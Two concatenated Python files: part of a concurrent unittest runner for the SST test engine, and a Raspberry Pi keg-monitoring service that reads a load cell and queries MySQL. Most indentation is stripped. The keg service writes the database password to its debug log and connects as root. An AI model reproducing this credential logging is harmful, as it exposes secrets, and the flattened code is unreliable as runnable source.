See: https://stackoverflow.com/questions/14050281/how-to-check-if-a-python-module-exists-without-importing-it
Args:
module_name (str): Module to be imported
Returns:
True if module is loadable
"""
if PY2:
import imp
try:
imp.find_module(module_name)
return True
except ImportError:
return False
else:
import importlib
import importlib.util
if not PY3_4_Plus:
avail = importlib.find_loader(module_name)
return avail is not None
else:
avail = importlib.util.find_spec(module_name)
return avail is not None
################################################################################
# See if we can import some optional modules
blessings_loaded = False
if check_module_conditional_import('blessings'):
import blessings
from blessings import Terminal
blessings_loaded = True
pygments_loaded = False
if check_module_conditional_import('pygments'):
import pygments
from pygments import formatters, highlight
pygments_loaded = True
try:
# Python 2
from pygments.lexers import PythonTracebackLexer as Lexer
except ImportError:
# Python 3
from pygments.lexers import Python3TracebackLexer as Lexer
# Queue module changes name between Py2->Py3
if PY3:
import queue
Queue = queue.Queue
else:
import Queue
Queue = Queue.Queue
# Try to import testtools (this may not be installed on system)
if check_module_conditional_import('testtools'):
import testtools
from testtools.testsuite import ConcurrentTestSuite
from testtools.testsuite import iterate_tests
TestSuiteBaseClass = ConcurrentTestSuite
else:
# If testtools not available, just trick the system to use unittest.TestSuite
# This allows us to continue, but not support concurrent testing
TestSuiteBaseClass = unittest.TestSuite
import test_engine_globals
from sst_unittest import *
from sst_unittest_support import *
from test_engine_support import strclass
from test_engine_support import strqual
from test_engine_junit import JUnitTestCase
if testing_check_is_py_2():
text_type = unicode
else:
text_type = str
################################################################################
def verify_concurrent_test_engine_available():
""" Check to see if we can load testtools if the user wants to run
in concurrent mode.
Will generate a Fatal error if system configuration does not support
concurrent testing.
"""
if test_engine_globals.TESTENGINE_CONCURRENTMODE:
if not check_module_conditional_import('testtools'):
errmsg = ("Test Frameworks Cannot Run Concurrently - ") + \
("User must perform 'pip install testtools'")
log_fatal(errmsg)
################################################################################
class SSTTextTestRunner(unittest.TextTestRunner):
""" A superclass to support SST required testing """
if blessings_loaded:
_terminal = Terminal()
colours = {
None: text_type,
'failed': _terminal.bold_red,
'passed': _terminal.green,
'notes': _terminal.bold_yellow,
}
else:
colours = {
None: text_type
}
def __init__(self, stream=sys.stderr, descriptions=True, verbosity=1,
failfast=False, buffer=False, resultclass=None,
no_colour_output=False):
super(SSTTextTestRunner, self).__init__(stream, descriptions, verbosity,
failfast, buffer, resultclass)
if not blessings_loaded or not pygments_loaded:
log_info(("Full colorized output can be obtained by running") +
(" 'pip install blessings pygments'"), forced=False)
if blessings_loaded:
self.no_colour_output = no_colour_output
else:
self.no_colour_output = True
log("\n=== TESTS STARTING " + ("=" * 51))
###
def run(self, test):
""" Run the tests."""
testing_start_time = time.time()
runresults = super(SSTTextTestRunner, self).run(test)
testing_stop_time = time.time()
total_testing_time = testing_stop_time - testing_start_time
self._get_and_display_test_results(runresults, total_testing_time)
return runresults
###
def did_tests_pass(self, run_results):
""" Figure out if testing passed.
Args:
run_results - A unittest.TestResult object
Returns:
True if all tests passed with no errors, False otherwise
"""
return run_results.wasSuccessful() and \
len(run_results.failures) == 0 and \
len(run_results.errors) == 0 and \
len(run_results.unexpectedSuccesses) == 0 and \
test_engine_globals.TESTENGINE_ERRORCOUNT == 0
###
def _get_and_display_test_results(self, run_results, total_testing_time):
""" Figure out if testing passed, and display the test results.
Args:
run_results - A unittest.TestResult object
total_testing_time - Total wall-clock testing time, in seconds
"""
numpassingtests = run_results.testsRun - len(run_results.failures) \
- len(run_results.skipped) \
- len(run_results.errors) \
- len(run_results.expectedFailures) \
- len(run_results.unexpectedSuccesses)
if not self.did_tests_pass(run_results):
log(("\n=== TEST RESULTS BREAKDOWN ========") +
("==================================="))
run_results.get_testsuites_results_dict().log_fail_error_skip_unexpeced_results()
log(("\n=== TEST RESULTS SUMMARY ==========") +
("===================================\n"))
log("Tests Run = {0}".format(run_results.testsRun))
log(40 * "-")
log("Passing = {0}".format(numpassingtests))
log("Failures = {0}".format(len(run_results.failures)))
log("Skipped = {0}".format(len(run_results.skipped)))
log("Errors = {0}".format(len(run_results.errors)))
log("Expected Failures = {0}".format(len(run_results.expectedFailures)))
log("Unexpected Successes = {0}".format(len(run_results.unexpectedSuccesses)))
log("Testing Notes = {0}".format(len(test_engine_globals.TESTENGINE_TESTNOTESLIST)))
log(("-----------------------------------") +
("-----------------------------------"))
t_min, t_sec = divmod(total_testing_time, 60)
t_hr, t_min = divmod(t_min, 60)
log("-- Total Test Time = {0:d} Hours, {1:d} Minutes, {2:2.3f} Seconds --".format(int(t_hr), int(t_min), t_sec))
if self.did_tests_pass(run_results):
if self.no_colour_output:
color_type = None
else:
color_type = 'passed'
log_forced(str(self.colours[color_type]("\n====================")))
log_forced(str(self.colours[color_type]("== TESTING PASSED ==")))
log_forced(str(self.colours[color_type]("====================")))
else:
if self.no_colour_output:
color_type = None
else:
color_type = 'failed'
if test_engine_globals.TESTENGINE_ERRORCOUNT == 0:
log_forced(str(self.colours[color_type]("\n====================")))
log_forced(str(self.colours[color_type]("== TESTING FAILED ==")))
log_forced(str(self.colours[color_type]("====================")))
else:
log_forced(str(self.colours[color_type]("\n==================================")))
log_forced(str(self.colours[color_type]("== TESTING FAILED DUE TO ERRORS ==")))
log_forced(str(self.colours[color_type]("==================================")))
if test_engine_globals.TESTENGINE_TESTNOTESLIST:
if self.no_colour_output:
color_type = None
else:
color_type = 'notes'
log_forced(str(self.colours[color_type](("\n=== TESTING NOTES =================") +
("==================================="))))
for note in test_engine_globals.TESTENGINE_TESTNOTESLIST:
log_forced(str(self.colours[color_type](" - {0}".format(note))))
log(("\n===================================") +
("===================================\n"))
################################################################################
class SSTTextTestResult(unittest.TestResult):
""" A superclass to support SST required testing, this is a modified version
of unittestTextTestResult from python 2.7 modified for SST's needs.
"""
separator1 = '=' * 70
separator2 = '-' * 70
indent = ' ' * 4
_test_class = None
if blessings_loaded:
_terminal = Terminal()
colours = {
None: text_type,
'error': _terminal.bold_yellow,
'expected': _terminal.green,
'fail': _terminal.bold_red,
'skip': _terminal.bold_blue,
'success': _terminal.green,
'title': _terminal.magenta,
'unexpected': _terminal.bold_red,
}
else:
colours = {
None: text_type
}
if pygments_loaded:
formatter = formatters.Terminal256Formatter()
lexer = Lexer()
def __init__(self, stream, descriptions, verbosity, no_colour_output=False):
super(SSTTextTestResult, self).__init__(stream, descriptions, verbosity)
self.testsuitesresultsdict = SSTTestSuitesResultsDict()
self._test_name = "undefined_testname"
self._testcase_name = "undefined_testcasename"
self._testsuite_name = "undefined_testsuitename"
self._junit_test_case = None
self.stream = stream
self.showAll = verbosity > 1
self.dots = verbosity == 1
self.descriptions = descriptions
if blessings_loaded:
self.no_colour_output = no_colour_output
else:
self.no_colour_output = True
def getShortDescription(self, test):
doc_first_line = test.shortDescription()
if self.descriptions and doc_first_line:
return '\n'.join((str(test), doc_first_line))
else:
return str(test)
def getLongDescription(self, test):
doc_first_line = test.shortDescription()
if self.descriptions and doc_first_line:
return '\n'.join((str(test), doc_first_line))
return str(test)
def getClassDescription(self, test):
test_class = test.__class__
doc = test_class.__doc__
if self.descriptions and doc:
return doc.strip().split('\n')[0].strip()
return strclass(test_class)
###
def startTest(self, test):
super(SSTTextTestResult, self).startTest(test)
#log_forced("DEBUG - startTest: Test = {0}\n".format(test))
if self.showAll:
if not test_engine_globals.TESTENGINE_CONCURRENTMODE:
if self._test_class != test.__class__:
self._test_class = test.__class__
title = self.getClassDescription(test)
if self.no_colour_output:
self.stream.writeln(self.colours[None](title))
else:
self.stream.writeln(self.colours['title'](title))
self.stream.flush()
self._test_name = "undefined_testname"
_testname = getattr(test, 'testname', None)
if _testname is not None:
self._test_name = test.testname
if self._is_test_of_type_ssttestcase(test):
self._testcase_name = test.get_testcase_name()
self._testsuite_name = test.get_testsuite_name()
else:
self._testcase_name = "FailedTest"
self._testsuite_name = "FailedTest"
timestamp = datetime.utcnow().strftime("%Y_%m%d_%H:%M:%S.%f utc")
self._junit_test_case = JUnitTestCase(self._test_name,
self._testcase_name,
timestamp=timestamp)
def stopTest(self, test):
super(SSTTextTestResult, self).stopTest(test)
#log_forced("DEBUG - stopTest: Test = {0}\n".format(test))
testruntime = 0
if self._is_test_of_type_ssttestcase(test):
testruntime = test.get_test_runtime_sec()
self._junit_test_case.junit_add_elapsed_sec(testruntime)
if not self._is_test_of_type_ssttestcase(test):
return
if not test_engine_globals.TESTENGINE_CONCURRENTMODE:
test_engine_globals.TESTRUN_JUNIT_TESTCASE_DICTLISTS['singlethread'].\
append(self._junit_test_case)
else:
test_engine_globals.TESTRUN_JUNIT_TESTCASE_DICTLISTS[self._testsuite_name].\
append(self._junit_test_case)
###
def get_testsuites_results_dict(self):
""" Return the test suites results dict """
return self.testsuitesresultsdict
###
def printResult(self, test, short, extended, colour_key=None, showruntime=True):
if self.no_colour_output:
colour = self.colours[None]
else:
colour = self.colours[colour_key]
if self.showAll:
self.stream.write(self.indent)
self.stream.write(colour(extended))
self.stream.write(" -- ")
self.stream.write(self.getShortDescription(test))
testruntime = 0
if self._is_test_of_type_ssttestcase(test):
testruntime = test.get_test_runtime_sec()
if showruntime:
self.stream.writeln(" [{0:.3f}s]".format(testruntime))
else:
self.stream.writeln(" ".format(testruntime))
self.stream.flush()
elif self.dots:
self.stream.write(colour(short))
self.stream.flush()
###
def addSuccess(self, test):
super(SSTTextTestResult, self).addSuccess(test)
#log_forced("DEBUG - addSuccess: Test = {0}\n".format(test))
self.printResult(test, '.', 'PASS', 'success')
if not self._is_test_of_type_ssttestcase(test):
return
self.testsuitesresultsdict.add_success(test)
def addError(self, test, err):
super(SSTTextTestResult, self).addError(test, err)
#log_forced("DEBUG - addError: Test = {0}, err = {1}\n".format(test, err))
self.printResult(test, 'E', 'ERROR', 'error')
if not self._is_test_of_type_ssttestcase(test):
return
self.testsuitesresultsdict.add_error(test)
_junit_test_case = getattr(self, '_junit_test_case', None)
if _junit_test_case is not None:
err_msg = self._get_err_info(err)
_junit_test_case.junit_add_error_info(err_msg)
def addFailure(self, test, err):
super(SSTTextTestResult, self).addFailure(test, err)
#log_forced("DEBUG - addFailure: Test = {0}, err = {1}\n".format(test, err))
self.printResult(test, 'F', 'FAIL', 'fail')
if not self._is_test_of_type_ssttestcase(test):
return
self.testsuitesresultsdict.add_failure(test)
_junit_test_case = getattr(self, '_junit_test_case', None)
if _junit_test_case is not None:
err_msg = self._get_err_info(err)
_junit_test_case.junit_add_failure_info(err_msg)
def addSkip(self, test, reason):
super(SSTTextTestResult, self).addSkip(test, reason)
#log_forced("DEBUG - addSkip: Test = {0}, reason = {1}\n".format(test, reason))
if not test_engine_globals.TESTENGINE_IGNORESKIPS:
self.printResult(test, 's', 'SKIPPED', 'skip', showruntime=False)
if not self._is_test_of_type_ssttestcase(test):
return
self.testsuitesresultsdict.add_skip(test)
_junit_test_case = getattr(self, '_junit_test_case', None)
if _junit_test_case is not None:
_junit_test_case.junit_add_skipped_info(reason)
def addExpectedFailure(self, test, err):
# NOTE: This is not a failure, but an identified pass
# since we are expecting a failure
super(SSTTextTestResult, self).addExpectedFailure(test, err)
#log_forced("DEBUG - addExpectedFailure: Test = {0}, err = {1}\n".format(test, err))
self.printResult(test, 'x', 'EXPECTED FAILURE', 'expected')
if not self._is_test_of_type_ssttestcase(test):
return
self.testsuitesresultsdict.add_expected_failure(test)
def addUnexpectedSuccess(self, test):
# NOTE: This is a failure, since we passed, but were expecting a failure
super(SSTTextTestResult, self).addUnexpectedSuccess(test)
#log_forced("DEBUG - addUnexpectedSuccess: Test = {0}\n".format(test))
self.printResult(test, 'u', 'UNEXPECTED SUCCESS', 'unexpected')
if not self._is_test_of_type_ssttestcase(test):
return
self.testsuitesresultsdict.add_unexpected_success(test)
_junit_test_case = getattr(self, '_junit_test_case', None)
if _junit_test_case is not None:
_junit_test_case.junit_add_failure_info("RECEIVED SUCCESS WHEN EXPECTING A FAILURE")
###
def printErrors(self):
if self.dots or self.showAll:
self.stream.writeln()
log("=" * 70)
log("=== TESTS FINISHED " + ("=" * 51))
log("=" * 70 + "\n")
if not test_engine_globals.TESTENGINE_IGNORESKIPS:
self.printSkipList('SKIPPED', self.skipped)
self.printErrorList('ERROR', self.errors)
self.printErrorList('FAIL', self.failures)
def printErrorList(self, flavour, errors):
if self.no_colour_output:
colour = self.colours[None]
else:
colour = self.colours[flavour.lower()]
for test, err in errors:
self.stream.writeln(self.separator1)
title = '%s: %s' % (flavour, self.getLongDescription(test))
self.stream.writeln(colour(title))
self.stream.writeln(self.separator2)
if pygments_loaded:
self.stream.writeln(highlight(err, self.lexer, self.formatter))
else:
self.stream.writeln(err)
def printSkipList(self, flavour, errors):
if self.no_colour_output:
colour = self.colours[None]
else:
colour = self.colours["skip"]
for test, err in errors:
title = '%s: %s' % (flavour, self.getLongDescription(test))
self.stream.writeln(colour(title))
if pygments_loaded:
self.stream.writeln(highlight(err, self.lexer, self.formatter))
else:
self.stream.writeln(err)
####
def _get_err_info(self, err):
"""Converts a sys.exc_info() into a string."""
exctype, value, tback = err
msg_lines = traceback.format_exception_only(exctype, value)
msg_lines = [x.replace('\n', ' ') for x in msg_lines]
return ''.join(msg_lines)
####
def _is_test_of_type_ssttestcase(self, test):
""" Detirmine if this is is within a valid SSTTestCase object by
checking if a unique SSTTestCase function exists
return: True if this is a test within a valid SSTTestCase object
"""
return getattr(test, 'get_testcase_name', None) is not None
################################################################################
# TestSuiteBaseClass will be either unittest.TestSuite or testtools.ConcurrentTestSuite
# and is defined at the top of this file.
class SSTTestSuite(TestSuiteBaseClass):
"""A TestSuite whose run() method can execute tests concurrently.
but also supports the python base unittest.TestSuite functionality.
This is a highly modified version of testtools.ConcurrentTestSuite
class to support startUpModuleConcurrent() & tearDownModuleConcurrent()
and to also support the limiting of parallel threads in flight.
This object will normally be derived from testtools.ConcurrentTestSuite
class, however, if the import of testtools failed, it will be derived from
unittest.TestSuite.
If the user selected concurrent mode is false, then it will always make
calls to the unittest.TestSuite class EVEN IF it is derived from
testtools.ConcurrentTestSuite, which is itself derived from unittest.TestSuite.
"""
def __init__(self, suite, make_tests, wrap_result=None):
"""Create a ConcurrentTestSuite or unittest.TestSuite to execute the suite.
Note: If concurrent mode is false, then it will always make calls to the
unittest.TestSuite class EVEN IF the class is derived from
testtools.ConcurrentTestSuite.
Args:
suite: A suite to run concurrently.
make_tests: A helper function to split the tests in the
ConcurrentTestSuite into some number of concurrently executing
sub-suites. make_tests must take a suite, and return an iterable
of TestCase-like object, each of which must have a run(result)
method. NOT USED IN unittest.TestSuite.
wrap_result: An optional function that takes a thread-safe
result and a thread number and must return a ``TestResult``
object. If not provided, then ``ConcurrentTestSuite`` will just
use a ``ThreadsafeForwardingResult`` wrapped around the result
passed to ``run()``. NOT USED IN unittest.TestSuite
"""
if not test_engine_globals.TESTENGINE_CONCURRENTMODE:
# Ignore make_tests and wrap_results
super(unittest.TestSuite, self).__init__(suite)
else:
super(SSTTestSuite, self).__init__(suite, make_tests, wrap_result)
####
def run(self, result):
"""Run the tests (possibly concurrently).
This calls out to the provided make_tests helper, and then serialises
the results so that result only sees activity from one TestCase at
a time.
ConcurrentTestSuite provides no special mechanism to stop the tests
returned by make_tests, it is up to the make_tests to honour the
shouldStop attribute on the result object they are run with, which will
be set if an exception is raised in the thread which
ConcurrentTestSuite.run() is called in.
NOTE: This is a highly modified version of the
testtools.ConcurrentTestSuite.run() method. It was changed to
support running a limited number of concurrent threads.
If concurrent mode is false, then it will always make calls to the
unittest.TestSuite class EVEN IF it is derived from
testtools.ConcurrentTestSuite.
"""
# Check to verify if we are NOT in concurrent mode, if so, then
# just call the run (this will be unittest.TestSuite's run())
if not test_engine_globals.TESTENGINE_CONCURRENTMODE:
return super(unittest.TestSuite, self).run(result)
# Perform the Concurrent Run
tests = self.make_tests(self)
thread_limit = test_engine_globals.TESTENGINE_THREADLIMIT
test_index = -1
try:
threads = {}
testqueue = Queue()
semaphore = threading.Semaphore(1)
test_iter = iter(tests)
test = "startup_placeholder"
tests_finished = False
while not tests_finished:
while len(threads) < thread_limit and test is not None:
#log_forced("DEBUG: CALLING FOR NEXT TEST; threads = {0}".format(len(threads)))
test = next(test_iter, None)
if result.shouldStop:
tests_finished = True
test_index += 1
#log_forced("DEBUG: TEST = {0}; index = {1}".format(test, test_index))
if test is not None:
process_result = self._wrap_result(testtools.\
ThreadsafeForwardingResult(result, semaphore), test_index)
reader_thread = threading.\
Thread(target=self._run_test, args=(test, process_result, testqueue))
threads[test] = reader_thread, process_result
reader_thread.start()
#log_forced("DEBUG: ADDED TEST = {0}; threads = {1}".\
#format(test, len(threads)))
if threads:
#log_forced("DEBUG: IN THREADS PROESSING")
finished_test = testqueue.get()
#log_forced("DEBUG: FINISHED TEST = {0}".format(finished_test))
threads[finished_test][0].join()
del threads[finished_test]
#log_forced("DEBUG: FINISHED TEST NUM THREADS = {0}".format(len(threads)))
#log_forced("DEBUG: FINISHED TEST THREADS keys = {0}".format(threads.keys()))
else:
tests_finished = True
test_engine_globals.TESTRUN_TESTRUNNINGFLAG = False
except:
for thread, process_result in threads.values():
process_result.stop()
raise
###
def _run_test(self, test, process_result, testqueue):
"""Support running a single test concurrently
NOTE: This is a slightly modified version of the
testtools.ConcurrentTestSuite._run_test() method. It was changed
to call the module-level functions
setUpModuleConcurrent() and tearDownModuleConcurrent()
"""
try:
try:
setUpModuleConcurrent(test)
test_engine_globals.TESTRUN_TESTRUNNINGFLAG = True
test.run(process_result)
tearDownModuleConcurrent(test)
except Exception:
# The run logic itself failed.
case = testtools.ErrorHolder("broken-runner", error=sys.exc_info())
case.run(process_result)
finally:
testqueue.put(test)
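# --- Illustrative sketch (not part of the suite class) -----------------------
# The modified run() above keeps at most TESTENGINE_THREADLIMIT tests in
# flight: it starts worker threads until the limit is reached, then blocks on
# a queue until one finishes before starting the next. A stripped-down,
# self-contained version of that pattern (the work items here are plain
# callables, an assumption made only for illustration):
def _run_with_thread_limit(callables, thread_limit):
    import threading
    try:
        import queue as queue_mod        # Python 3
    except ImportError:
        import Queue as queue_mod        # Python 2
    finished_q = queue_mod.Queue()
    active = {}

    def _worker(item):
        try:
            item()
        finally:
            finished_q.put(item)

    pending = iter(callables)
    item = next(pending, None)
    while item is not None or active:
        # start new workers until the limit is hit or work runs out
        while item is not None and len(active) < thread_limit:
            thread = threading.Thread(target=_worker, args=(item,))
            active[item] = thread
            thread.start()
            item = next(pending, None)
        # wait for one worker to finish before looping again
        done_item = finished_q.get()
        active.pop(done_item).join()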
################################################################################
class SSTTestSuiteResultData:
""" Support class to hold result data for a specific testsuite
Results are stored as lists of test names
"""
def __init__(self):
self._tests_passing = []
self._tests_failing = []
self._tests_errored = []
self._tests_skiped = []
self._tests_expectedfailed = []
self._tests_unexpectedsuccess = []
def add_success(self, test):
""" Add a test to the success record"""
self._tests_passing.append(test)
def add_failure(self, test):
""" Add a test to the failure record"""
self._tests_failing.append(test)
def add_error(self, test):
""" Add a test to the error record"""
self._tests_errored.append(test)
def add_skip(self, test):
""" Add a test to the skip record"""
self._tests_skiped.append(test)
def add_expected_failure(self, test):
""" Add a test to the expected failure record"""
self._tests_expectedfailed.append(test)
def add_unexpected_success(self, test):
""" Add a test to the unexpected success record"""
self._tests_unexpectedsuccess.append(test)
def get_passing(self):
""" Return the tests passing list"""
return self._tests_passing
def get_failed(self):
""" Return the tests failed list"""
return self._tests_failing
def get_errored(self):
""" Return the tests errored list"""
return self._tests_errored
def get_skiped(self):
""" Return the tests skipped list"""
return self._tests_skiped
def get_expectedfailed(self):
""" Return the expected failed list"""
return self._tests_expectedfailed
def get_unexpectedsuccess(self):
""" Return the tests unexpected success list"""
return self._tests_unexpectedsuccess
###
class SSTTestSuitesResultsDict:
""" Support class handle of dict of result data for all testsuites
"""
def __init__(self):
self.testsuitesresultsdict = {}
def add_success(self, test):
""" Add a testsuite and test to the success record"""
self._get_testresult_from_testmodulecase(test).add_success(test)
def add_failure(self, test):
""" Add a testsuite and test to the failure record"""
self._get_testresult_from_testmodulecase(test).add_failure(test)
def add_error(self, test):
""" Add a testsuite and test to the error record"""
self._get_testresult_from_testmodulecase(test).add_error(test)
def add_skip(self, test):
""" Add a testsuite and test to the skip record"""
self._get_testresult_from_testmodulecase(test).add_skip(test)
def add_expected_failure(self, test):
""" Add a testsuite and test to the expected failure record"""
self._get_testresult_from_testmodulecase(test).add_expected_failure(test)
def add_unexpected_success(self, test):
""" Add a testsuite and test to the unexpected success record"""
self._get_testresult_from_testmodulecase(test).add_unexpected_success(test)
def log_all_results(self):
""" Log all result catagories by testsuite """
# Log the data by key
for tmtc_name in self.testsuitesresultsdict:
log("\n{0}".format(tmtc_name))
for testname in self.testsuitesresultsdict[tmtc_name].get_passing():
log(" - PASSED : {0}".format(testname))
for testname in self.testsuitesresultsdict[tmtc_name].get_failed():
log(" - FAILED : {0}".format(testname))
for testname in self.testsuitesresultsdict[tmtc_name].get_errored():
log(" - ERROR : {0}".format(testname))
for testname in self.testsuitesresultsdict[tmtc_name].get_skiped():
log(" - SKIPPED : {0}".format(testname))
for testname in self.testsuitesresultsdict[tmtc_name].get_expectedfailed():
log(" - EXPECTED FAILED : {0}".format(testname))
for testname in self.testsuitesresultsdict[tmtc_name].get_unexpectedsuccess():
log(" - UNEXPECTED SUCCESS : {0}".format(testname))
def log_fail_error_skip_unexpeced_results(self):
""" Log non-success result catagories by testsuite """
# Log the data by key
for tmtc_name in self.testsuitesresultsdict:
# Don't log if everything passes
if len(self.testsuitesresultsdict[tmtc_name].get_failed()) == 0 and \
len(self.testsuitesresultsdict[tmtc_name].get_errored()) == 0 and \
len(self.testsuitesresultsdict[tmtc_name].get_expectedfailed()) == 0 and \
len(self.testsuitesresultsdict[tmtc_name].get_unexpectedsuccess()) == 0:
pass
else:
log("\n{0}".format(tmtc_name))
for testname in self.testsuitesresultsdict[tmtc_name].get_failed():
log(" - FAILED : {0}".format(testname))
for testname in self.testsuitesresultsdict[tmtc_name].get_errored():
log(" - ERROR : {0}".format(testname))
for testname in self.testsuitesresultsdict[tmtc_name].get_expectedfailed():
log(" - EXPECTED FAILED : {0}".format(testname))
for testname in self.testsuitesresultsdict[tmtc_name].get_unexpectedsuccess():
log(" - UNEXPECTED SUCCESS : {0}".format(testname))
def _get_testresult_from_testmodulecase(self, test):
tm_tc = self._get_test_module_test_case_name(test)
if tm_tc not in self.testsuitesresultsdict.keys():
self.testsuitesresultsdict[tm_tc] = SSTTestSuiteResultData()
return self.testsuitesresultsdict[tm_tc]
def _get_test_module_test_case_name(self, test):
return "{0}.{1}".format(self._get_test_module_name(test),
self._get_test_case_name(test))
def _get_test_case_name(self, test):
return strqual(test.__class__)
def _get_test_module_name(self, test):
return strclass(test.__class__)
|
kegdata.py
|
#!/usr/bin/python
# coding: UTF-8
# kegdata service to read keg status
# Written by: Ron Ritchey
from __future__ import unicode_literals
import json, threading, logging, Queue, time, getopt, sys, datetime
import RPi.GPIO as GPIO
import pymysql.cursors
from hx711 import HX711
# HOW TO CALCULATE THE REFERENCE UNIT
# To calibrate, first set the reference unit to 1, then put a known weight (e.g. 1 kg) on your sensor and note the raw reading.
# In this case, 92 raw counts is 1 gram because, with 1 as the reference unit, I got numbers near 0 without any weight
# and numbers around 184000 when I added 2 kg. So, by the rule of three:
# if 2000 grams reads 184000, then 1 gram is 184000 / 2000 = 92.
#hx.set_reference_unit(1)
#hx.set_reference_unit(92)
#hx.set_reference_unit(10772)
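# --- Illustrative sketch ------------------------------------------------------
# The reference unit is just raw-counts-per-unit-of-weight: put a known weight
# on the load cell, read the raw value, and divide. A tiny helper showing that
# arithmetic with the numbers from the comment above:
def calc_reference_unit(raw_reading, known_weight):
    """Return raw HX711 counts per weight unit (e.g. per gram)."""
    return float(raw_reading) / known_weight

# calc_reference_unit(184000, 2000) -> 92.0, i.e. hx.set_reference_unit(92)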
class kegdata():
kegdata_init = {
'name':'',
'description':'',
'abv':0.0,
'ibu':0.0,
'originalgravity':0.0,
'finalgravity':0.0,
'color':0.0,
'kegged':datetime.datetime.fromtimestamp(0),
'tapped':datetime.datetime.fromtimestamp(0),
'brewed':datetime.datetime.fromtimestamp(0),
'notes':'',
'weight':0.0,
}
varcheck = {
u'unicode':
[
u'name',
u'description',
u'notes'
],
u'int':
[
u'weight',
],
u'float':
[
u'abv',
u'ibu',
u'originalgravity',
u'finalgravity',
u'color'
],
u'datetime.datetime':
[
u'kegged',
u'tapped',
u'brewed',
]
}
def __init__(self, q, server, port, pwd, tap):
self.dataqueue = q
self.kegdata = self.kegdata_init
self.kegdata_prev = { }
self.server = server
self.port = port
self.pwd = pwd
self.tap = tap
self.connection_failed = 0
self.dataclient = None
print "Initializing keg data service"
self.hx = HX711(25,24)
self.hx.set_reading_format("LSB", "MSB")
self.hx.set_reference_unit(673)
self.hx.reset()
self.hx.tare()
# Now set up a thread to listen to the channel and update our data when
# the channel indicates a relevant key has changed
data_t = threading.Thread(target=self.run)
data_t.daemon = True
data_t.start()
def validatekegvars(self, vars):
for vtype, members in self.varcheck.iteritems():
if vtype == u'unicode':
for v in members:
try:
if type(vars[v]) is unicode:
continue
if type(vars[v]) is None:
vars[v] = u""
elif type(vars[v]) is str:
logging.debug(u"Received string in {0}. Converting to Unicode".format(v))
vars[v] = vars[v].decode()
else:
# This happens so often when playing from webradio that I'm disabling logging for now.
# logging.debug(u"Received non-string type {0} in {1}. Converting to null".format(type(vars[v]),v))
vars[v] = u""
except KeyError:
logging.debug(u"Missing required value {0}. Adding empty version".format(v))
vars[v] = u""
elif vtype == u'bool':
for v in members:
try:
if type(vars[v]) is bool:
continue
if type(vars[v]) is None:
vars[v] = False
elif type(vars[v]) is int:
logging.debug(u"Received integer in {0}. Converting to boolean".format(v))
vars[v] = bool(vars[v])
else:
logging.debug(u"Received non-bool type {0} in {1}. Converting to False".format(type(vars[v]),v))
vars[v] = False
except KeyError:
logging.debug(u"Missing required value {0}. Adding empty version".format(v))
vars[v] = False
elif vtype == u'int':
for v in members:
try:
if type(vars[v]) is int:
continue
if type(vars[v]) is None:
vars[v] = 0
elif type(vars[v]) is bool:
logging.debug(u"Received boolean in {0}. Converting to integer".format(v))
vars[v] = int(vars[v])
else:
logging.debug(u"Received non-integer type {0} in {1}. Converting to 0".format(type(vars[v]),v))
vars[v] = 0
except KeyError:
logging.debug(u"Missing required value {0}. Adding empty version".format(v))
vars[v] = 0
elif vtype == u'datetime.datetime':
for v in members:
try:
if type(vars[v]) is datetime.datetime:
continue
if type(vars[v]) is None:
vars[v] = datetime.datetime.fromtimestamp(0)
else:
logging.debug(u"Received non-datetime type {0} in {1}. Converting to empty date".format(type(vars[v]),v))
vars[v] = datetime.datetime.fromtimestamp(0)
except KeyError:
logging.debug(u"Missing required value {0}. Adding empty version".format(v))
vars[v] = datetime.datetime.fromtimestamp(0)
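# --- Illustrative sketch (not part of the class) ------------------------------
# validatekegvars() walks the varcheck table above and repairs each field so
# downstream consumers always see the declared type. The same idea in a
# compact, generic form (the defaults table is an assumption made only for
# illustration, not the real varcheck structure):
def _coerce_fields(record, defaults):
    """Ensure every key exists and has the same type as its default value."""
    for key, default in defaults.items():
        value = record.get(key)
        if not isinstance(value, type(default)):
            record[key] = default
    return record

# _coerce_fields({"abv": "oops"}, {"abv": 0.0, "name": u""})
# -> {"abv": 0.0, "name": u""}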
def connect(self):
# Try up to 10 times to connect to the mySQL service
self.connection_failed = 0
logging.debug(u"Connecting to mySQL service on {0}:{1}".format(self.server, self.port))
while True:
if self.connection_failed >= 10:
logging.debug(u"Could not connect to mySQL service")
raise RuntimeError(u"Could not connect to mySQL service")
try:
# Connection to mySQL
logging.debug("Connecting to {0} with password {1}".format(self.server, self.pwd))
conn = pymysql.connect(host=self.server,
db='pydKeg',
user='root',
charset='utf8',
password=self.pwd,
autocommit=True,
cursorclass=pymysql.cursors.DictCursor)
if conn.open:
logging.debug('Connected to MySQL database')
self.dataclient = conn
break
except Exception:
# connection attempt failed: record the failure and retry after a pause
self.dataclient = None
self.connection_failed += 1
time.sleep(1)
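# --- Illustrative sketch (not part of the class) ------------------------------
# connect() retries up to 10 times with a one-second pause before giving up.
# The same retry-with-limit shape as a stand-alone helper (connect_once is a
# hypothetical callable that raises on failure and returns a connection on
# success):
def _retry_connect(connect_once, attempts=10, delay=1):
    import time
    for _ in range(attempts):
        try:
            return connect_once()
        except Exception:
            time.sleep(delay)
    raise RuntimeError(u"Could not connect after %d attempts" % attempts)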
#
# def subscribe(self):
# # Try to subscribe. If you fail, reconnect and try again.
# # If you fail, allow the resulting exception to be passed on.
#
# try:
# # Create a pubsub to receive messages
# self.pubsub = self.dataclient.pubsub(ignore_subscribe_messages=True)
#
# # Subscribe to act_player_info keyspace events
# self.pubsub.psubscribe(u'__key*__:act_player_info')
# except redis.ConnectionError:
# self.connect()
#
# # Try again to subscribe
# # Create a pubsub to receive messages
# self.pubsub = self.dataclient.pubsub(ignore_subscribe_messages=True)
#
# # Subscribe to act_player_info keyspace events
# self.pubsub.subscribe(u'__key*__:act_player_info')
def run(self):
logging.debug(u"kegdata service starting")
while True:
if self.dataclient is None:
try:
# Try to connect
self.connect()
self.status()
self.sendUpdate()
except (RuntimeError):
self.dataclient = None
# On connection error, sleep 5 and then return to top and try again
time.sleep(5)
continue
try:
self.status()
self.sendUpdate()
time.sleep(5)
except (RuntimeError):
# if we lose our connection while trying to query DB
# sleep 5 and then return to top to try again
self.dataclient = None
logging.debug(u"Could not get status from mySQL service")
time.sleep(5)
continue
def status(self):
# Read kegplayer status and update kegdata
cursor = self.dataclient.cursor()
cursor.execute("SELECT Beer FROM Tap WHERE Tap.Tap = %s", (self.tap) )
row = cursor.fetchone()
if row is not None:
Beer = row['Beer']
else:
Beer = ''
cursor.execute("SELECT * FROM Beer WHERE Beer.idBeer = %s", (Beer))
row = cursor.fetchone()
